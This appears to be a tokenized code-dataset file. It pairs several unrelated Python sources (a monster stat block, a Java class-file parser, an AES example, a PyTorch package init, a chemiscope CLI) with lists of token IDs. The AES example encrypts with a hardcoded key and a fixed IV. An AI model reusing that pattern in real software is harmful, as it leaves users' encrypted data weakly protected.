220,
220,
220,
220,
1394,
62,
1676,
25,
352,
13,
30072,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
697,
1635,
28,
1802,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
62,
4868,
796,
685,
22462,
11,
697,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
7203,
14402,
62,
22462,
318,
1391,
15,
58,
15,
5974,
13,
19,
69,
5512,
9922,
318,
1391,
15,
58,
16,
5974,
13,
17,
69,
92,
4,
526,
13,
18982,
7,
4798,
62,
4868,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
264,
408,
13,
19836,
3419
] | 1.891842 | 3,236 |
#Declaring vars goes like this:
#
#in the file, all ya gotta do is specify
#
#<monster>_<info> = "value"
#
#info can be:
#
#size
#hitpoints
#speed
#strength
#dexterity
#constitution
#intelligence
#wisdom
#charisma
#senses
#language
#challenge
#dice
#initiative
#armor
#baseattack
#attack
#fullattack
#reach
#specialattack
#specialquality
#enviroment
#
#Remember that you dont have to specify everything, like senses for example
beholder_desc = '"It floats before you, a bulbous body with a central, unblinking eye, and a large maw filled with daggerlike teeth. Smaller eyes, attached to wriggling stalks, sprout from the top of the orblike body."'
beholder_size = "Large Aberration"
beholder_dice = "11d8+44 (93 hp)"
beholder_initiative = "+6"
beholder_armor = "26 (-1 size, +2 Dex, +15 natural), touch 11, flat-footed 24"
beholder_speed = "5ft. (1 square), fly 20ft. (good)"
beholder_baseattack = "+8/+12"
beholder_attack = "Eye rays +9 ranged touch and bite +2 melee (2d4)"
beholder_fullattack = "Same as attack"
beholder_reach = "10ft./5ft."
beholder_specialattack = "Eye rays"
beholder_specialquality = "All-around vision, antimagic cone, darkvision 60 ft., and flight."
beholder_enviroment = "Cold hills" | [
2,
37835,
1723,
410,
945,
2925,
588,
428,
25,
198,
2,
198,
2,
259,
262,
2393,
11,
477,
21349,
17753,
466,
318,
11986,
220,
198,
2,
198,
2,
27,
39050,
29,
62,
27,
10951,
29,
796,
366,
8367,
1,
198,
2,
198,
2,
10951,
460,
307,
25,
198,
2,
198,
2,
7857,
198,
2,
17945,
13033,
198,
2,
12287,
198,
2,
41402,
198,
2,
67,
1069,
353,
414,
198,
2,
9979,
2738,
198,
2,
32683,
198,
2,
86,
9350,
198,
2,
10641,
38017,
198,
2,
82,
4541,
198,
2,
16129,
198,
2,
36747,
3540,
198,
2,
67,
501,
198,
2,
259,
8846,
876,
198,
2,
40456,
198,
2,
8692,
20358,
198,
2,
20358,
198,
2,
12853,
20358,
198,
2,
16250,
198,
2,
20887,
20358,
198,
2,
20887,
13237,
198,
2,
24330,
343,
296,
298,
198,
2,
198,
2,
16676,
326,
345,
17666,
423,
284,
11986,
2279,
11,
588,
17627,
329,
1672,
198,
198,
1350,
13829,
62,
20147,
796,
705,
1,
1026,
36016,
878,
345,
11,
257,
28287,
516,
1767,
351,
257,
4318,
11,
555,
2436,
8040,
4151,
11,
290,
257,
1588,
285,
707,
5901,
351,
31322,
2339,
9941,
13,
10452,
263,
2951,
11,
7223,
284,
1319,
6950,
1359,
336,
23833,
11,
7500,
448,
422,
262,
1353,
286,
262,
15769,
2339,
1767,
526,
6,
198,
1350,
13829,
62,
7857,
796,
366,
21968,
27700,
1358,
1,
198,
1350,
13829,
62,
67,
501,
796,
366,
1157,
67,
23,
10,
2598,
357,
6052,
27673,
16725,
198,
1350,
13829,
62,
259,
8846,
876,
796,
43825,
21,
1,
198,
1350,
13829,
62,
40456,
796,
366,
2075,
13841,
16,
2546,
11,
1343,
17,
16750,
11,
1343,
1314,
3288,
828,
3638,
1367,
11,
6228,
12,
43127,
1987,
1,
198,
1350,
13829,
62,
12287,
796,
366,
20,
701,
13,
357,
16,
6616,
828,
6129,
1160,
701,
13,
357,
11274,
16725,
198,
1350,
13829,
62,
8692,
20358,
796,
43825,
23,
28404,
1065,
1,
198,
1350,
13829,
62,
20358,
796,
366,
24876,
24823,
1343,
24,
17929,
3638,
290,
13197,
1343,
17,
16837,
357,
17,
67,
19,
16725,
198,
1350,
13829,
62,
12853,
20358,
796,
366,
30556,
355,
1368,
1,
198,
1350,
13829,
62,
16250,
796,
366,
940,
701,
19571,
20,
701,
526,
198,
1350,
13829,
62,
20887,
20358,
796,
366,
24876,
24823,
1,
198,
1350,
13829,
62,
20887,
13237,
796,
366,
3237,
12,
14145,
5761,
11,
37802,
9083,
27763,
11,
3223,
10178,
3126,
10117,
1539,
290,
5474,
526,
198,
1350,
13829,
62,
24330,
343,
296,
298,
796,
366,
34312,
18639,
1
] | 2.953659 | 410 |
# ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
import sys
from .java_types import *
from .class_flags import ClassFlags
from . import signature_parser
class AttributeInfo(object):
"""
Encapsulate the attribute_info class.
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#43817
attribute_info {
u2 attribute_name_index;
u4 attribute_length;
u1 info[attribute_length];
}
"""
def size(self):
"""Total size of the attribute_info blob."""
return self._size
def bytes(self):
"""Attribute-specific data for subclasses."""
return self._info_data
class Code(AttributeInfo):
"""
Code_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 max_stack;
u2 max_locals;
u4 code_length;
u1 code[code_length];
u2 exception_table_length;
{
u2 start_pc;
u2 end_pc;
u2 handler_pc;
u2 catch_type;
} exception_table[exception_table_length];
u2 attributes_count;
attribute_info attributes[attributes_count];
}
"""
@staticmethod
class SourceFile(AttributeInfo):
"""
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#79868
SourceFile_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 sourcefile_index;
}
"""
@staticmethod
class Exceptions(AttributeInfo):
"""
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#3129
Exceptions_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 number_of_exceptions;
u2 exception_index_table[number_of_exceptions];
}
"""
@staticmethod
class Signature(AttributeInfo):
"""
Signature_attribute {
u2 attribute_name_index;
u4 attribute_length;
u2 signature_index
}
"""
@staticmethod
class InnerClassFlags(object):
"""http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#75734
"""
ACC_PUBLIC = 0x0001
ACC_PRIVATE = 0x0002
ACC_PROTECTED = 0x0004
ACC_STATIC = 0x0008
ACC_FINAL = 0x0010
ACC_INTERFACE = 0x0200
ACC_ABSTRACT = 0x0400
ACC_SYNTHETIC = 0x1000
ACC_ANNOTATION = 0x2000
ACC_ENUM = 0x4000
MASK = ACC_PUBLIC | ACC_PRIVATE | ACC_PROTECTED | \
ACC_STATIC | ACC_FINAL | ACC_INTERFACE | \
ACC_ABSTRACT | ACC_SYNTHETIC | ACC_ANNOTATION | \
ACC_ENUM
class InnerClasses(AttributeInfo):
"""
http://java.sun.com/docs/books/jvms/second_edition/html/ClassFile.doc.html#79996
InnerClasses_attribute {
u2 attribute_name_index;
u4 attribute_length;
------
u2 number_of_classes;
{ u2 inner_class_info_index;
u2 outer_class_info_index;
u2 inner_name_index;
u2 inner_class_access_flags;
} classes[number_of_classes];
}
"""
@staticmethod
class Attribute(object):
"""
Factory for producing AttributeInfos.
"""
_KNOWN_ATTRIBUTE_MAP = {
SourceFile.name(): SourceFile,
Signature.name(): Signature,
Exceptions.name(): Exceptions,
Code.name(): Code
# InnerClasses.name(): InnerClasses
}
@staticmethod
def parse(data, constants):
"""Parse the Attribute_info
@data: The data stream from which to deserialize the blob
@constants: The constant pool of the class file.
"""
attribute_name_index = u2(data[0:2]).get()
attribute_name = constants[attribute_name_index]
attribute_class = Attribute._KNOWN_ATTRIBUTE_MAP.get(attribute_name.bytes(), None)
if attribute_class is not None:
return attribute_class(data, constants)
else:
return AttributeInfo(data, constants)
| [
2,
38093,
10052,
28,
198,
2,
15069,
2813,
3009,
11,
3457,
13,
198,
2,
16529,
3880,
438,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
670,
2845,
287,
11846,
351,
262,
13789,
13,
198,
2,
921,
743,
7330,
257,
4866,
286,
262,
13789,
287,
262,
38559,
24290,
2393,
11,
393,
379,
25,
198,
2,
198,
2,
220,
2638,
1378,
2503,
13,
43073,
13,
2398,
14,
677,
4541,
14,
43,
2149,
24290,
12,
17,
13,
15,
198,
2,
198,
2,
17486,
2672,
416,
9723,
1099,
393,
4987,
284,
287,
3597,
11,
3788,
198,
2,
9387,
739,
262,
13789,
318,
9387,
319,
281,
366,
1921,
3180,
1,
29809,
1797,
11,
198,
2,
42881,
34764,
11015,
6375,
7102,
49828,
11053,
3963,
15529,
509,
12115,
11,
2035,
4911,
393,
17142,
13,
198,
2,
4091,
262,
13789,
329,
262,
2176,
3303,
15030,
21627,
290,
198,
2,
11247,
739,
262,
13789,
13,
198,
2,
38093,
10052,
28,
198,
198,
11748,
25064,
198,
6738,
764,
12355,
62,
19199,
1330,
1635,
198,
6738,
764,
4871,
62,
33152,
1330,
5016,
40053,
198,
6738,
764,
1330,
9877,
62,
48610,
198,
198,
4871,
3460,
4163,
12360,
7,
15252,
2599,
198,
220,
37227,
198,
220,
220,
220,
14711,
1686,
5039,
262,
11688,
62,
10951,
1398,
13,
198,
220,
220,
220,
2638,
1378,
12355,
13,
19155,
13,
785,
14,
31628,
14,
12106,
14,
73,
85,
907,
14,
12227,
62,
28736,
14,
6494,
14,
9487,
8979,
13,
15390,
13,
6494,
2,
43704,
1558,
628,
220,
220,
220,
11688,
62,
10951,
1391,
198,
220,
220,
220,
220,
220,
334,
17,
11688,
62,
3672,
62,
9630,
26,
198,
220,
220,
220,
220,
220,
334,
19,
11688,
62,
13664,
26,
198,
220,
220,
220,
220,
220,
334,
16,
7508,
58,
42348,
62,
13664,
11208,
198,
220,
220,
220,
1782,
198,
220,
37227,
628,
220,
825,
2546,
7,
944,
2599,
198,
220,
220,
220,
37227,
14957,
2546,
286,
262,
11688,
62,
10951,
44812,
526,
15931,
198,
220,
220,
220,
1441,
2116,
13557,
7857,
628,
220,
825,
9881,
7,
944,
2599,
198,
220,
220,
220,
37227,
33682,
12,
11423,
1366,
329,
850,
37724,
526,
15931,
198,
220,
220,
220,
1441,
2116,
13557,
10951,
62,
7890,
198,
198,
4871,
6127,
7,
33682,
12360,
2599,
198,
220,
37227,
198,
220,
220,
220,
6127,
62,
42348,
1391,
198,
220,
220,
220,
220,
220,
334,
17,
11688,
62,
3672,
62,
9630,
26,
198,
220,
220,
220,
220,
220,
334,
19,
11688,
62,
13664,
26,
198,
220,
220,
220,
220,
220,
334,
17,
3509,
62,
25558,
26,
198,
220,
220,
220,
220,
220,
334,
17,
3509,
62,
17946,
874,
26,
198,
220,
220,
220,
220,
220,
334,
19,
2438,
62,
13664,
26,
198,
220,
220,
220,
220,
220,
334,
16,
2438,
58,
8189,
62,
13664,
11208,
198,
220,
220,
220,
220,
220,
334,
17,
6631,
62,
11487,
62,
13664,
26,
198,
220,
220,
220,
220,
220,
1391,
198,
220,
220,
220,
220,
220,
220,
220,
334,
17,
923,
62,
14751,
26,
198,
220,
220,
220,
220,
220,
220,
220,
334,
17,
886,
62,
14751,
26,
198,
220,
220,
220,
220,
220,
220,
220,
334,
17,
21360,
62,
14751,
26,
198,
220,
220,
220,
220,
220,
220,
220,
334,
17,
4929,
62,
4906,
26,
198,
220,
220,
220,
220,
1782,
6631,
62,
11487,
58,
1069,
4516,
62,
11487,
62,
13664,
11208,
198,
220,
220,
220,
220,
334,
17,
12608,
62,
9127,
26,
198,
220,
220,
220,
220,
11688,
62,
10951,
12608,
58,
1078,
7657,
62,
9127,
11208,
198,
220,
1782,
198,
220,
37227,
198,
220,
2488,
12708,
24396,
198,
198,
4871,
8090,
8979,
7,
33682,
12360,
2599,
198,
220,
37227,
198,
220,
220,
220,
2638,
1378,
12355,
13,
19155,
13,
785,
14,
31628,
14,
12106,
14,
73,
85,
907,
14,
12227,
62,
28736,
14,
6494,
14,
9487,
8979,
13,
15390,
13,
6494,
2,
43240,
3104,
198,
220,
220,
220,
8090,
8979,
62,
42348,
1391,
198,
220,
220,
220,
220,
220,
334,
17,
11688,
62,
3672,
62,
9630,
26,
198,
220,
220,
220,
220,
220,
334,
19,
11688,
62,
13664,
26,
198,
220,
220,
220,
220,
220,
334,
17,
2723,
7753,
62,
9630,
26,
198,
220,
220,
220,
1782,
198,
220,
37227,
198,
220,
2488,
12708,
24396,
198,
198,
4871,
1475,
11755,
7,
33682,
12360,
2599,
198,
220,
37227,
198,
220,
220,
220,
2638,
1378,
12355,
13,
19155,
13,
785,
14,
31628,
14,
12106,
14,
73,
85,
907,
14,
12227,
62,
28736,
14,
6494,
14,
9487,
8979,
13,
15390,
13,
6494,
2,
18,
18741,
198,
220,
220,
220,
1475,
11755,
62,
42348,
1391,
198,
220,
220,
220,
220,
220,
334,
17,
11688,
62,
3672,
62,
9630,
26,
198,
220,
220,
220,
220,
220,
334,
19,
11688,
62,
13664,
26,
198,
220,
220,
220,
220,
220,
334,
17,
1271,
62,
1659,
62,
1069,
11755,
26,
198,
220,
220,
220,
220,
220,
334,
17,
6631,
62,
9630,
62,
11487,
58,
17618,
62,
1659,
62,
1069,
11755,
11208,
198,
220,
220,
220,
1782,
198,
220,
37227,
198,
220,
2488,
12708,
24396,
198,
198,
4871,
34894,
7,
33682,
12360,
2599,
198,
220,
37227,
198,
220,
220,
220,
34894,
62,
42348,
1391,
198,
220,
220,
220,
220,
220,
334,
17,
11688,
62,
3672,
62,
9630,
26,
198,
220,
220,
220,
220,
220,
334,
19,
11688,
62,
13664,
26,
198,
220,
220,
220,
220,
220,
334,
17,
9877,
62,
9630,
198,
220,
220,
220,
1782,
198,
220,
37227,
198,
220,
2488,
12708,
24396,
198,
198,
4871,
24877,
9487,
40053,
7,
15252,
2599,
198,
220,
37227,
4023,
1378,
12355,
13,
19155,
13,
785,
14,
31628,
14,
12106,
14,
73,
85,
907,
14,
12227,
62,
28736,
14,
6494,
14,
9487,
8979,
13,
15390,
13,
6494,
2,
39251,
2682,
198,
220,
37227,
198,
220,
15859,
62,
5105,
32936,
197,
796,
657,
87,
18005,
198,
220,
15859,
62,
4805,
3824,
6158,
197,
796,
657,
87,
34215,
198,
220,
15859,
62,
4805,
2394,
9782,
1961,
197,
796,
657,
87,
830,
19,
198,
220,
15859,
62,
35744,
2149,
197,
796,
657,
87,
830,
23,
198,
220,
15859,
62,
37,
17961,
197,
796,
657,
87,
37187,
198,
220,
15859,
62,
41358,
49836,
197,
796,
657,
87,
44613,
198,
220,
15859,
62,
6242,
18601,
10659,
197,
796,
657,
87,
3023,
405,
198,
220,
15859,
62,
23060,
45,
4221,
2767,
2149,
197,
796,
657,
87,
12825,
198,
220,
15859,
62,
1565,
11929,
6234,
796,
657,
87,
11024,
198,
220,
15859,
62,
1677,
5883,
197,
796,
657,
87,
27559,
628,
220,
32337,
42,
796,
15859,
62,
5105,
32936,
220,
220,
930,
15859,
62,
4805,
3824,
6158,
220,
220,
930,
15859,
62,
4805,
2394,
9782,
1961,
220,
930,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
15859,
62,
35744,
2149,
220,
220,
930,
15859,
62,
37,
17961,
220,
220,
220,
220,
930,
15859,
62,
41358,
49836,
220,
930,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
15859,
62,
6242,
18601,
10659,
930,
15859,
62,
23060,
45,
4221,
2767,
2149,
930,
15859,
62,
1565,
11929,
6234,
930,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
15859,
62,
1677,
5883,
198,
198,
4871,
24877,
9487,
274,
7,
33682,
12360,
2599,
198,
220,
37227,
198,
220,
220,
220,
2638,
1378,
12355,
13,
19155,
13,
785,
14,
31628,
14,
12106,
14,
73,
85,
907,
14,
12227,
62,
28736,
14,
6494,
14,
9487,
8979,
13,
15390,
13,
6494,
2,
45455,
4846,
198,
220,
220,
220,
24877,
9487,
274,
62,
42348,
1391,
198,
220,
220,
220,
220,
220,
334,
17,
11688,
62,
3672,
62,
9630,
26,
198,
220,
220,
220,
220,
220,
334,
19,
11688,
62,
13664,
26,
198,
220,
220,
220,
220,
220,
40103,
198,
220,
220,
220,
220,
220,
334,
17,
1271,
62,
1659,
62,
37724,
26,
198,
220,
220,
220,
220,
220,
1391,
220,
334,
17,
8434,
62,
4871,
62,
10951,
62,
9630,
26,
198,
220,
220,
220,
220,
220,
220,
220,
220,
334,
17,
12076,
62,
4871,
62,
10951,
62,
9630,
26,
198,
220,
220,
220,
220,
220,
220,
220,
220,
334,
17,
8434,
62,
3672,
62,
9630,
26,
198,
220,
220,
220,
220,
220,
220,
220,
220,
334,
17,
8434,
62,
4871,
62,
15526,
62,
33152,
26,
198,
220,
220,
220,
220,
220,
1782,
6097,
58,
17618,
62,
1659,
62,
37724,
11208,
198,
220,
220,
220,
1782,
198,
220,
37227,
198,
220,
2488,
12708,
24396,
198,
198,
4871,
3460,
4163,
7,
15252,
2599,
198,
220,
37227,
198,
220,
220,
220,
19239,
329,
9194,
3460,
4163,
18943,
418,
13,
198,
220,
37227,
628,
220,
4808,
44706,
62,
1404,
5446,
9865,
37780,
62,
33767,
796,
1391,
198,
220,
220,
220,
8090,
8979,
13,
3672,
33529,
8090,
8979,
11,
198,
220,
220,
220,
34894,
13,
3672,
33529,
34894,
11,
198,
220,
220,
220,
1475,
11755,
13,
3672,
33529,
1475,
11755,
11,
198,
220,
220,
220,
6127,
13,
3672,
33529,
6127,
198,
220,
220,
220,
1303,
24877,
9487,
274,
13,
3672,
33529,
24877,
9487,
274,
198,
220,
1782,
628,
220,
2488,
12708,
24396,
198,
220,
825,
21136,
7,
7890,
11,
38491,
2599,
198,
220,
220,
220,
37227,
10044,
325,
262,
3460,
4163,
62,
10951,
628,
220,
220,
220,
220,
220,
2488,
7890,
25,
383,
1366,
4269,
422,
543,
284,
748,
48499,
1096,
262,
44812,
198,
220,
220,
220,
220,
220,
2488,
9979,
1187,
25,
383,
6937,
5933,
286,
262,
1398,
2393,
13,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
11688,
62,
3672,
62,
9630,
796,
334,
17,
7,
7890,
58,
15,
25,
17,
35944,
1136,
3419,
198,
220,
220,
220,
11688,
62,
3672,
220,
220,
220,
220,
220,
220,
796,
38491,
58,
42348,
62,
3672,
62,
9630,
60,
628,
220,
220,
220,
11688,
62,
4871,
796,
3460,
4163,
13557,
44706,
62,
1404,
5446,
9865,
37780,
62,
33767,
13,
1136,
7,
42348,
62,
3672,
13,
33661,
22784,
6045,
8,
198,
220,
220,
220,
611,
11688,
62,
4871,
318,
407,
6045,
25,
198,
220,
220,
220,
220,
220,
1441,
11688,
62,
4871,
7,
7890,
11,
38491,
8,
198,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
1441,
3460,
4163,
12360,
7,
7890,
11,
38491,
8,
198
] | 2.725045 | 1,673 |
from pathlib import Path
| [
6738,
3108,
8019,
1330,
10644,
628
] | 4.333333 | 6 |
from Crypto.Cipher import AES
from pkcs7 import PKCS7Encoder
import base64
key = 'your key 16bytes'
# 16 byte initialization vector
iv = '1234567812345678'
aes = AES.new(key, AES.MODE_CBC, iv)
encoder = PKCS7Encoder()
text = 'This is my plain text'
# pad the plain text according to PKCS7
pad_text = encoder.encode(text)
# encrypt the padding text
cipher = aes.encrypt(pad_text)
# base64 encode the cipher text for transport
enc_cipher = base64.b64encode(cipher)
print enc_cipher
| [
6738,
36579,
13,
34,
10803,
1330,
34329,
198,
6738,
279,
74,
6359,
22,
1330,
29673,
7902,
22,
27195,
12342,
198,
11748,
2779,
2414,
198,
198,
2539,
796,
705,
14108,
1994,
1467,
33661,
6,
198,
2,
1467,
18022,
37588,
15879,
198,
452,
796,
705,
10163,
2231,
30924,
10163,
2231,
30924,
6,
198,
198,
64,
274,
796,
34329,
13,
3605,
7,
2539,
11,
34329,
13,
49058,
62,
29208,
11,
21628,
8,
198,
12685,
12342,
796,
29673,
7902,
22,
27195,
12342,
3419,
198,
198,
5239,
796,
705,
1212,
318,
616,
8631,
2420,
6,
198,
198,
2,
14841,
262,
8631,
2420,
1864,
284,
29673,
7902,
22,
198,
15636,
62,
5239,
796,
2207,
12342,
13,
268,
8189,
7,
5239,
8,
198,
2,
34117,
262,
24511,
2420,
198,
66,
10803,
796,
257,
274,
13,
12685,
6012,
7,
15636,
62,
5239,
8,
198,
2,
2779,
2414,
37773,
262,
38012,
2420,
329,
4839,
198,
12685,
62,
66,
10803,
796,
2779,
2414,
13,
65,
2414,
268,
8189,
7,
66,
10803,
8,
198,
198,
4798,
2207,
62,
66,
10803,
628
] | 2.858824 | 170 |
from __future__ import print_function
minimum_required = '1.0.0'
# Ensure Pytorch is importable and its version is sufficiently recent. This
# needs to happen before anything else, since the imports below will try to
# import Pytorch, too.
def _ensure_pt_install(): # pylint: disable=g-statement-before-imports
"""Attempt to import Pytorch, and ensure its version is sufficient.
Raises:
ImportError: if either Pytorch is not importable or its version is
inadequate.
"""
try:
import torch
except ImportError:
# Print more informative error message, then reraise.
print('\n\nFailed to import Pytorch. '
'To use neuralnet-pytorch, please install '
'Pytorch (> %s) by following instructions at '
'https://pytorch.org/get-started/locally/.\n\n' % minimum_required)
raise
del torch
_ensure_pt_install()
# Cleanup symbols to avoid polluting namespace.
del minimum_required
import sys as _sys
for symbol in ['_ensure_pt_install', '_sys']:
delattr(_sys.modules[__name__], symbol)
try:
import neuralnet_pytorch.ext as ext
cuda_ext_available = True
del ext
except ModuleNotFoundError:
cuda_ext_available = False
from . import utils
from .utils import DataLoader, DataPrefetcher, cuda_available, function
from .layers import *
from .metrics import *
from .monitor import *
from . import optim
from .version import author as __author__
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
| [
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
198,
39504,
62,
35827,
796,
705,
16,
13,
15,
13,
15,
6,
628,
198,
2,
48987,
9485,
13165,
354,
318,
1330,
540,
290,
663,
2196,
318,
17338,
2274,
13,
770,
198,
2,
2476,
284,
1645,
878,
1997,
2073,
11,
1201,
262,
17944,
2174,
481,
1949,
284,
198,
2,
1330,
9485,
13165,
354,
11,
1165,
13,
198,
4299,
4808,
641,
495,
62,
457,
62,
17350,
33529,
220,
1303,
279,
2645,
600,
25,
15560,
28,
70,
12,
26090,
12,
19052,
12,
320,
3742,
198,
220,
220,
220,
37227,
37177,
284,
1330,
9485,
13165,
354,
11,
290,
4155,
663,
2196,
318,
6751,
13,
198,
220,
220,
220,
7567,
2696,
25,
198,
220,
220,
220,
17267,
12331,
25,
611,
2035,
9485,
13165,
354,
318,
407,
1330,
540,
393,
663,
2196,
318,
198,
220,
220,
220,
20577,
13,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
1949,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1330,
28034,
198,
220,
220,
220,
2845,
17267,
12331,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
12578,
517,
30304,
4049,
3275,
11,
788,
302,
40225,
13,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
10786,
59,
77,
59,
77,
37,
6255,
284,
1330,
9485,
13165,
354,
13,
705,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
2514,
779,
17019,
3262,
12,
9078,
13165,
354,
11,
3387,
2721,
705,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
20519,
13165,
354,
45160,
4064,
82,
8,
416,
1708,
7729,
379,
705,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
5450,
1378,
9078,
13165,
354,
13,
2398,
14,
1136,
12,
46981,
14,
17946,
453,
11757,
59,
77,
59,
77,
6,
4064,
5288,
62,
35827,
8,
198,
220,
220,
220,
220,
220,
220,
220,
5298,
628,
220,
220,
220,
1619,
28034,
628,
198,
62,
641,
495,
62,
457,
62,
17350,
3419,
198,
198,
2,
5985,
929,
14354,
284,
3368,
3278,
15129,
25745,
13,
198,
12381,
5288,
62,
35827,
198,
11748,
25064,
355,
4808,
17597,
198,
198,
1640,
6194,
287,
37250,
62,
641,
495,
62,
457,
62,
17350,
3256,
705,
62,
17597,
6,
5974,
198,
220,
220,
220,
1619,
35226,
28264,
17597,
13,
18170,
58,
834,
3672,
834,
4357,
6194,
8,
198,
198,
28311,
25,
198,
220,
220,
220,
1330,
17019,
3262,
62,
9078,
13165,
354,
13,
2302,
355,
1070,
198,
220,
220,
220,
269,
15339,
62,
2302,
62,
15182,
796,
6407,
198,
220,
220,
220,
1619,
1070,
198,
16341,
19937,
3673,
21077,
12331,
25,
198,
220,
220,
220,
269,
15339,
62,
2302,
62,
15182,
796,
10352,
198,
198,
6738,
764,
1330,
3384,
4487,
198,
6738,
764,
26791,
1330,
6060,
17401,
11,
6060,
36698,
316,
2044,
11,
269,
15339,
62,
15182,
11,
2163,
198,
6738,
764,
75,
6962,
1330,
1635,
198,
6738,
764,
4164,
10466,
1330,
1635,
198,
6738,
764,
41143,
1330,
1635,
198,
6738,
764,
1330,
6436,
198,
198,
6738,
764,
9641,
1330,
1772,
355,
11593,
9800,
834,
198,
6738,
47540,
9641,
1330,
651,
62,
47178,
198,
198,
834,
9641,
834,
796,
651,
62,
47178,
3419,
17816,
9641,
20520,
198,
12381,
651,
62,
47178,
198
] | 2.899254 | 536 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from .input import write_input
def main():
"""
Command-line utility to generate an input for chemiscope — the interactive
structure-property explorer. Parses an input file containing atomic
structures using the ASE I/O module, and converts it into a JSON file that
can be loaded in chemiscope. Frame and environment properties must be
written in the same file containing atomic structures: we recommend the
extended xyz format, which is flexible and simple. In all cases, this
utility will simply write to the JSON file anything that is readable by
ASE.
"""
import argparse
try:
# command-line execution. requires ASE IO module
import ase.io as ase_io
except ImportError:
raise ImportError(
"chemiscope_input needs ASE modules to parse structure inputs"
)
# Tweak the autogenerated help output to look nicer
parser = argparse.ArgumentParser(
description=main.__doc__, formatter_class=formatter
)
parser.add_argument(
"input", type=str, help="input file containing the structures and properties"
)
parser.add_argument(
"-o", "--output", type=str, help="chemiscope output file in JSON format"
)
parser.add_argument(
"-c",
"--cutoff",
type=float,
help="generate atom-centred environments with the given cutoff",
)
group = parser.add_mutually_exclusive_group()
group.add_argument(
"--only-atoms",
action="store_true",
help="only use per-atom properties from the input file",
)
group.add_argument(
"--only-structures",
action="store_true",
help="only use per-structure properties from the input file",
)
parser.add_argument("--name", default="", type=str, help="name of the dataset")
parser.add_argument(
"--description", default="", type=str, help="description of the dataset"
)
parser.add_argument(
"--authors", nargs="*", type=str, default=[], help="list of dataset authors"
)
parser.add_argument(
"--references",
nargs="*",
type=str,
default=[],
help="list of references for the dataset",
)
args = parser.parse_args()
if args.only_atoms and args.cutoff is None:
raise Exception("--only-atoms requires to give --cutoff")
if args.only_structures and args.cutoff is not None:
raise Exception("--only-structure can not be given with --cutoff")
# read file with ASE and remove extraneous properties
frames = ase_io.read(args.input, ":")
if args.only_structures:
for frame in frames:
for key in list(frame.arrays.keys()):
if key not in ["positions", "numbers"]:
del frame.arrays[key]
elif args.only_atoms:
for frame in frames:
frame.info = {}
# determine output file name automatically if missing
output = args.output or args.input + "_chemiscope.json.gz"
write_input(
path=output,
frames=frames,
meta={
"name": args.name,
"description": args.description,
"authors": args.authors,
"references": args.references,
},
cutoff=args.cutoff,
)
if __name__ == "__main__":
main()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
6738,
764,
15414,
1330,
3551,
62,
15414,
628,
198,
4299,
1388,
33529,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
9455,
12,
1370,
10361,
284,
7716,
281,
5128,
329,
4607,
2304,
3008,
851,
262,
14333,
198,
220,
220,
220,
4645,
12,
26745,
39349,
13,
23042,
274,
281,
5128,
2393,
7268,
17226,
198,
220,
220,
220,
8573,
1262,
262,
317,
5188,
314,
14,
46,
8265,
11,
290,
26161,
340,
656,
257,
19449,
2393,
326,
198,
220,
220,
220,
460,
307,
9639,
287,
4607,
2304,
3008,
13,
25184,
290,
2858,
6608,
1276,
307,
198,
220,
220,
220,
3194,
287,
262,
976,
2393,
7268,
17226,
8573,
25,
356,
4313,
262,
198,
220,
220,
220,
7083,
2124,
45579,
5794,
11,
543,
318,
12846,
290,
2829,
13,
554,
477,
2663,
11,
428,
198,
220,
220,
220,
10361,
481,
2391,
3551,
284,
262,
19449,
2393,
1997,
326,
318,
31744,
416,
198,
220,
220,
220,
317,
5188,
13,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
1330,
1822,
29572,
628,
220,
220,
220,
1949,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
3141,
12,
1370,
9706,
13,
4433,
317,
5188,
24418,
8265,
198,
220,
220,
220,
220,
220,
220,
220,
1330,
257,
325,
13,
952,
355,
257,
325,
62,
952,
198,
220,
220,
220,
2845,
17267,
12331,
25,
198,
220,
220,
220,
220,
220,
220,
220,
5298,
17267,
12331,
7,
198,
220,
220,
220,
220,
220,
